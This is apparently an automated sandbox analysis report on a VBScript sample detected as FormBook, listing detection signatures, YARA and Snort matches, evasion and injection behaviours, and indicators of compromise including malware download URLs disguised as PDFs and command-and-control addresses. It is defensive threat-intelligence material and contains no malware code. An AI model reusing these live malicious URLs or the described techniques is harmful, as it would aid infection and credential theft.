Windows Analysis Report
daveCrpted.vbs

Overview

General Information

Sample Name: daveCrpted.vbs
Analysis ID: 635407
MD5: dc70eefa088f688d1cd4c4cf2c6674ca
SHA1: c358867a468d9722b3c40f0bcd0cbe2534756545
SHA256: 1ec2c2c0a29c16146400c52880e887cfae57223b2b621c0f433ef9b619af5343
Tags: Formbook, vbs, Xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Downloads files with wrong headers with respect to MIME Content-Type
Wscript starts Powershell (via cmd or directly)
Suspicious powershell command line found
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a start menu entry (Start Menu\Programs\Startup)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: daveCrpted.vbs ReversingLabs: Detection: 12%
Source: Yara match File source: 9.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.593036972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.573682986.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.468889612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.552581892.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.522677927.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.955473010.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.610838072.00000282491DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.588308493.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: http://20.106.232.4/dll/26-05-2022-StartUp.pdfPk Avira URL Cloud: Label: malware
Source: http://20.106.232.4/rumpe/26-05-2022-StartUp.pdf Avira URL Cloud: Label: malware
Source: http://20.106.232.4/dll/26-05-2022-StartUp.pdf Avira URL Cloud: Label: malware
Source: http://20.106.232.4 Avira URL Cloud: Label: malware
Source: http://2.56.57.22 Virustotal: Detection: 8%
Source: 24.0.RegAsm.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.RegAsm.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.RegAsm.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 24.0.RegAsm.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 24.2.RegAsm.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.RegAsm.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.RegAsm.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 24.0.RegAsm.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: Binary string: cmmon32.pdb source: RegAsm.exe, 00000009.00000003.572055079.0000000001124000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cmmon32.pdbGCTL source: RegAsm.exe, 00000009.00000003.572055079.0000000001124000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000009.00000002.574613863.0000000002C5F000.00000040.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000003.469567195.0000000002810000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.574322688.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000003.471300384.00000000029AD000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: WAUgLeAhDG.pdb source: powershell.exe, 00000006.00000002.503711509.0000012FE07B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.484215461.0000012FC8389000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegAsm.exe
Source: Binary string: WAUgLeAhDG.pdbH|^| P|_CorDllMainmscoree.dll source: powershell.exe, 00000006.00000002.503711509.0000012FE07B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.484215461.0000012FC8389000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ddscfIvqgW.pdb source: powershell.exe, 00000006.00000002.483842645.0000012FC8286000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.503455529.0000012FE0190000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then pop edi 9_2_00415B28
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 4x nop then pop edi 23_2_03215B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then pop edi 24_2_00415B28

Networking

Source: Traffic Snort IDS: 2025011 ET TROJAN Powershell commands sent B64 2 20.106.232.4:80 -> 192.168.2.5:49738
Source: Traffic Snort IDS: 2025011 ET TROJAN Powershell commands sent B64 2 20.106.232.4:80 -> 192.168.2.5:49778
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49870 -> 118.27.122.216:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49870 -> 118.27.122.216:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49870 -> 118.27.122.216:80
Source: http Bad PDF prefix: HTTP/1.1 200 OK Date: Fri, 27 May 2022 19:15:31 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.28 Last-Modified: Thu, 26 May 2022 14:26:51 GMT ETag: "3aac-5dfeafb144fa1" Accept-Ranges: bytes Content-Length: 15020 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf
Source: http Bad PDF prefix: HTTP/1.1 200 OK Date: Fri, 27 May 2022 19:15:32 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.28 Last-Modified: Thu, 26 May 2022 14:25:11 GMT ETag: "1a580-5dfeaf520524a" Accept-Ranges: bytes Content-Length: 107904 Content-Type: application/pdf
Source: http Bad PDF prefix: HTTP/1.1 200 OK Date: Fri, 27 May 2022 19:16:25 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.28 Last-Modified: Thu, 26 May 2022 14:26:51 GMT ETag: "3aac-5dfeafb144fa1" Accept-Ranges: bytes Content-Length: 15020 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf
Source: http Bad PDF prefix: HTTP/1.1 200 OK Date: Fri, 27 May 2022 19:16:26 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.28 Last-Modified: Thu, 26 May 2022 14:25:11 GMT ETag: "1a580-5dfeaf520524a" Accept-Ranges: bytes Content-Length: 107904 Content-Type: application/pdf
Source: Yara match File source: 6.2.powershell.exe.12fc82bf280.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.powershell.exe.12fc8d3c6d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.powershell.exe.12fe0190000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.powershell.exe.28251060000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.powershell.exe.282392fdd48.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.powershell.exe.282396edb80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.503455529.0000012FE0190000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.611974071.0000028251060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: global traffic HTTP traffic detected: GET /dll/26-05-2022-StartUp.pdf HTTP/1.1Host: 20.106.232.4Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /rumpe/26-05-2022-StartUp.pdf HTTP/1.1Host: 20.106.232.4
Source: global traffic HTTP traffic detected: GET /tsdfguhijk.txt HTTP/1.1Host: 2.56.57.22Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: powershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://2.5
Source: powershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://2.56.57.22
Source: powershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://2.56.57.22/ts
Source: powershell.exe, 00000006.00000002.483842645.0000012FC8286000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://2.56.57.22/tsdfguhijk.txt
Source: powershell.exe, 00000006.00000002.483842645.0000012FC8286000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://2.56.57.22x
Source: powershell.exe, 00000006.00000002.490800447.0000012FC8C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.483072450.0000012FC80F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.106.232.4
Source: powershell.exe, 00000006.00000002.484659437.0000012FC8416000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.106.232.4/dll/26-05-2022-StartUp.pdf
Source: powershell.exe, 00000006.00000002.483072450.0000012FC80F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.106.232.4/dll/26-05-2022-StartUp.pdfPk
Source: powershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.106.232.4/rumpe/26-05-2022-StartUp.pdf
Source: powershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.106.232.48
Source: powershell.exe, 00000006.00000003.478394040.0000012FDFF82000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.503288727.0000012FDFF82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.6.
Source: powershell.exe, 00000004.00000002.514247971.000001A563378000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.503131093.0000012FDFF07000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.492751855.000001C7C7233000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000006.00000002.495224431.0000012FD7F45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.490798860.000001C7BF161000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.479916206.000001C7AF301000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.510984736.000001A54B2E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.480982102.0000012FC7EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.478703723.000001C7AF0F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.479916206.000001C7AF301000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000007.00000002.490798860.000001C7BF161000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.490798860.000001C7BF161000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.490798860.000001C7BF161000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000007.00000002.479916206.000001C7AF301000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.495224431.0000012FD7F45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.490798860.000001C7BF161000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown DNS traffic detected: queries for: www.nancykmorrison.store
Source: global traffic HTTP traffic detected: GET /dll/26-05-2022-StartUp.pdf HTTP/1.1Host: 20.106.232.4Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /rumpe/26-05-2022-StartUp.pdf HTTP/1.1Host: 20.106.232.4
Source: global traffic HTTP traffic detected: GET /tsdfguhijk.txt HTTP/1.1Host: 2.56.57.22Connection: Keep-Alive

E-Banking Fraud

Source: Yara match File source: 9.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.593036972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.573682986.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.468889612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.552581892.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.522677927.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.955473010.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.610838072.00000282491DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.588308493.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 9.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.powershell.exe.12fc82bf280.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects known downloader agent Author: ditekSHen
Source: 6.2.powershell.exe.12fc8d3c6d8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects known downloader agent Author: ditekSHen
Source: 9.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 24.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 24.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.powershell.exe.12fe0190000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects known downloader agent Author: ditekSHen
Source: 21.2.powershell.exe.28251060000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects known downloader agent Author: ditekSHen
Source: 24.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 24.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 24.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 24.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 24.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 24.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 24.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 24.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 24.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 24.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 21.2.powershell.exe.282392fdd48.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects known downloader agent Author: ditekSHen
Source: 24.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 24.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 21.2.powershell.exe.282396edb80.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects known downloader agent Author: ditekSHen
Source: 00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.593036972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.593036972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.573682986.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.573682986.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.468889612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.468889612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.503455529.0000012FE0190000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects known downloader agent Author: ditekSHen
Source: 0000000A.00000000.552581892.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.552581892.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.522677927.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.522677927.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.611974071.0000028251060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects known downloader agent Author: ditekSHen
Source: 00000017.00000002.955473010.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.955473010.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.610838072.00000282491DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.610838072.00000282491DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: powershell.exe PID: 7076, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6384, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
